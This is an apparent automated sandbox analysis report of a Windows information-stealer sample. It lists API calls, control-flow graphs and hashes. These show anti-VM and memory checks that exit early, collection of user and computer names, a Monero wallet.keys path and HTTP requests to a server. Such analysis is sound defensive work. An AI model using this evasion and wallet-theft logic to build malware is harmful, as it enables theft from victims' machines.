                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: 305a351eae42f6f5d5562b33f3840bfc1ca297de8b9cc642725c07738ca6ed0a
                                  • Instruction ID: afe060ae1e842d8ac6303af391da2b051ceddd48c7927f3464683fdc5633d131
                                  • Opcode Fuzzy Hash: 305a351eae42f6f5d5562b33f3840bfc1ca297de8b9cc642725c07738ca6ed0a
                                  • Instruction Fuzzy Hash: 52E10F71E10504ABCB24FBA4DDA3EFD77B9AF54300F4085E8B51666191EFB06A4CCB62

                                  Control-flow Graph

                                  control_flow_graph 1301 bb19f0-bb1a1d call bbade0 StrCmpCA 1304 bb1a1f-bb1a21 ExitProcess 1301->1304 1305 bb1a27-bb1a41 call bbade0 1301->1305 1309 bb1a44-bb1a48 1305->1309 1310 bb1a4e-bb1a61 1309->1310 1311 bb1c12-bb1c1d call bbab10 1309->1311 1313 bb1bee-bb1c0d 1310->1313 1314 bb1a67-bb1a6a 1310->1314 1313->1309 1316 bb1a99-bb1aa8 call bbab30 1314->1316 1317 bb1b1f-bb1b30 StrCmpCA 1314->1317 1318 bb1bdf-bb1be9 call bbab30 1314->1318 1319 bb1afd-bb1b0e StrCmpCA 1314->1319 1320 bb1a71-bb1a80 call bbab30 1314->1320 1321 bb1acf-bb1ae0 StrCmpCA 1314->1321 1322 bb1aad-bb1abe StrCmpCA 1314->1322 1323 bb1b63-bb1b74 StrCmpCA 1314->1323 1324 bb1b82-bb1b93 StrCmpCA 1314->1324 1325 bb1b41-bb1b52 StrCmpCA 1314->1325 1326 bb1ba1-bb1bb2 StrCmpCA 1314->1326 1327 bb1bc0-bb1bd1 StrCmpCA 1314->1327 1328 bb1a85-bb1a94 call bbab30 1314->1328 1316->1313 1342 bb1b3c 1317->1342 1343 bb1b32-bb1b35 1317->1343 1318->1313 1340 bb1b1a 1319->1340 1341 bb1b10-bb1b13 1319->1341 1320->1313 1338 bb1aee-bb1af1 1321->1338 1339 bb1ae2-bb1aec 1321->1339 1336 bb1aca 1322->1336 1337 bb1ac0-bb1ac3 1322->1337 1346 bb1b80 1323->1346 1347 bb1b76-bb1b79 1323->1347 1348 bb1b9f 1324->1348 1349 bb1b95-bb1b98 1324->1349 1344 bb1b5e 1325->1344 1345 bb1b54-bb1b57 1325->1345 1350 bb1bbe 1326->1350 1351 bb1bb4-bb1bb7 1326->1351 1330 bb1bdd 1327->1330 1331 bb1bd3-bb1bd6 1327->1331 1328->1313 1330->1313 1331->1330 1336->1313 1337->1336 1355 bb1af8 1338->1355 1339->1355 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00BB1A15
                                  • ExitProcess.KERNEL32 ref: 00BB1A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 00d2b4a4817434be63a03d2b5b038d837d9b5a35e0b3392338b7ba03fd96a82f
                                  • Instruction ID: 979970a3bf230cf2d00c559885b3012966ca0295502f9db336af3f269a903662
                                  • Opcode Fuzzy Hash: 00d2b4a4817434be63a03d2b5b038d837d9b5a35e0b3392338b7ba03fd96a82f
                                  • Instruction Fuzzy Hash: E3513CB5A04209EFCB14DF98D9A4BFE77F9EF44304F5048A8E816AB251E7B0E944CB51

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301358), ref: 00BB9BF1
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301208), ref: 00BB9C0A
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301250), ref: 00BB9C22
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301130), ref: 00BB9C3A
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,013011D8), ref: 00BB9C53
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01309548), ref: 00BB9C6B
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,012F6E68), ref: 00BB9C83
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,012F7188), ref: 00BB9C9C
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301160), ref: 00BB9CB4
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301178), ref: 00BB9CCC
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,013012C8), ref: 00BB9CE5
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,01301190), ref: 00BB9CFD
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,012F71A8), ref: 00BB9D15
                                    • Part of subcall function 00BB9BB0: GetProcAddress.KERNEL32(75900000,013011F0), ref: 00BB9D2E
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BA11D0: ExitProcess.KERNEL32 ref: 00BA1211
                                    • Part of subcall function 00BA1160: GetSystemInfo.KERNEL32(?), ref: 00BA116A
                                    • Part of subcall function 00BA1160: ExitProcess.KERNEL32 ref: 00BA117E
                                    • Part of subcall function 00BA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                    • Part of subcall function 00BA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                    • Part of subcall function 00BA1110: ExitProcess.KERNEL32 ref: 00BA1143
                                    • Part of subcall function 00BA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1258
                                    • Part of subcall function 00BA1220: __aulldiv.LIBCMT ref: 00BA1266
                                    • Part of subcall function 00BA1220: ExitProcess.KERNEL32 ref: 00BA1294
                                    • Part of subcall function 00BB6A10: GetUserDefaultLangID.KERNEL32 ref: 00BB6A14
                                    • Part of subcall function 00BA1190: ExitProcess.KERNEL32 ref: 00BA11C6
                                    • Part of subcall function 00BB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7A10
                                    • Part of subcall function 00BB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A17
                                    • Part of subcall function 00BB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB7A2F
                                    • Part of subcall function 00BB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7AA0
                                    • Part of subcall function 00BB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7AA7
                                    • Part of subcall function 00BB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB7ABF
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6D99
                                  • Sleep.KERNEL32(00001770), ref: 00BB6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6DBA
                                  • ExitProcess.KERNEL32 ref: 00BB6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: ac8ed910a7aa592bdf6c74f9eb4776c4f704619de1a4986bf10470eb2cfab236
                                  • Instruction ID: 0b44103eee5e1a5bdc05a14985661c1d62688dcc43ef52974d12aa6a476fbc72
                                  • Opcode Fuzzy Hash: ac8ed910a7aa592bdf6c74f9eb4776c4f704619de1a4986bf10470eb2cfab236
                                  • Instruction Fuzzy Hash: 0E311830E14208ABCB14FBE0DC57BFE77B9AF04300F5009A8F112A6192EFB06945C662

                                  Control-flow Graph

                                  control_flow_graph 1436 ba1220-ba1247 call bb8b40 GlobalMemoryStatusEx 1439 ba1249-ba1271 call bbdd30 * 2 1436->1439 1440 ba1273-ba127a 1436->1440 1441 ba1281-ba1285 1439->1441 1440->1441 1443 ba129a-ba129d 1441->1443 1444 ba1287 1441->1444 1446 ba1289-ba1290 1444->1446 1447 ba1292-ba1294 ExitProcess 1444->1447 1446->1443 1446->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BA123E
                                  • __aulldiv.LIBCMT ref: 00BA1258
                                  • __aulldiv.LIBCMT ref: 00BA1266
                                  • ExitProcess.KERNEL32 ref: 00BA1294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 5ef23b61a15afd9c4843ead126f65883555b94f3ee6f674b780f1f683cac4342
                                  • Instruction ID: d6b5d418bcb540e4dbfae1aea4acf93058dd9de02eafdb38633ebe981302e0a6
                                  • Opcode Fuzzy Hash: 5ef23b61a15afd9c4843ead126f65883555b94f3ee6f674b780f1f683cac4342
                                  • Instruction Fuzzy Hash: E4011DB0D44308FBEF50DFE4CC4ABAEBBB8AB15705F248898E604B61C0D7B495458B59

                                  Control-flow Graph

                                  control_flow_graph 1450 bb6d93 1451 bb6daa 1450->1451 1453 bb6d5a-bb6d77 call bbade0 OpenEventA 1451->1453 1454 bb6dac-bb6dc2 call bb6bc0 call bb5d60 CloseHandle ExitProcess 1451->1454 1460 bb6d79-bb6d91 call bbade0 CreateEventA 1453->1460 1461 bb6d95-bb6da4 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB6D99
                                  • Sleep.KERNEL32(00001770), ref: 00BB6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,013094D8,?,00BC10F4,?,00000000,?,00BC10F8,?,00000000,00BC0AF3), ref: 00BB6DBA
                                  • ExitProcess.KERNEL32 ref: 00BB6DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 37b8e64e5bfdf837b615b91aecce99958b834d27dd903d016e3320b9a95c2597
                                  • Instruction ID: 1d1812f056274a8d80c05d2e839a65839992894f59a93be1def503b14c864fe3
                                  • Opcode Fuzzy Hash: 37b8e64e5bfdf837b615b91aecce99958b834d27dd903d016e3320b9a95c2597
                                  • Instruction Fuzzy Hash: 3EF05830A48209AFEB10EBA0DC4ABFE33B4EF04701F5009B5B616A51E1CBF45944CA62

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 429047109682d84d9472f6951e103b11a3a8d8afe6c3ecb63f8d1c535f6f69cb
                                  • Instruction ID: 0423f0b7ab355902e47c6904d2b2251cdcc32050aabcb946b212a991de4f993b
                                  • Opcode Fuzzy Hash: 429047109682d84d9472f6951e103b11a3a8d8afe6c3ecb63f8d1c535f6f69cb
                                  • Instruction Fuzzy Hash: D6215EB1D00209ABDF10DFA5EC46ADE7BB5FB04320F008665F925A7290EB706A09CB81

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA62D0: InternetOpenA.WININET(00BC0DFF,00000001,00000000,00000000,00000000), ref: 00BA6331
                                    • Part of subcall function 00BA62D0: StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6353
                                    • Part of subcall function 00BA62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA6385
                                    • Part of subcall function 00BA62D0: HttpOpenRequestA.WININET(00000000,GET,?,0130E828,00000000,00000000,00400100,00000000), ref: 00BA63D5
                                    • Part of subcall function 00BA62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BA640F
                                    • Part of subcall function 00BA62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA6421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BB5478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: db9440c7e0f55b726a211f9658c2fefa45c2c54dfaaf4b55d40387069432ffdc
                                  • Instruction ID: 248dfb4426716ef2848fead07e79715bf942eefea3a0c5a40dcb409da4eda4c0
                                  • Opcode Fuzzy Hash: db9440c7e0f55b726a211f9658c2fefa45c2c54dfaaf4b55d40387069432ffdc
                                  • Instruction Fuzzy Hash: 9411B170D10108ABCB24FF64D992BFD77B99F50340F5045E8F91A575A2EFB0AB04CAA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00BB7ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: c21a33e66d864a47ed11da3763cef6f58512ef3f136d68127ffb0cd419d40cf5
                                  • Instruction ID: f2ae9e88c00d02fa3f7c81a71f09b3ea7c919fab0a669c50c86d7ab1f348f89d
                                  • Opcode Fuzzy Hash: c21a33e66d864a47ed11da3763cef6f58512ef3f136d68127ffb0cd419d40cf5
                                  • Instruction Fuzzy Hash: 3B01D6B1948349EFC700CF89DC85FAEBBF8F744710F100169F515E2290D7B45A0487A1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BA112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BA1132
                                  • ExitProcess.KERNEL32 ref: 00BA1143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
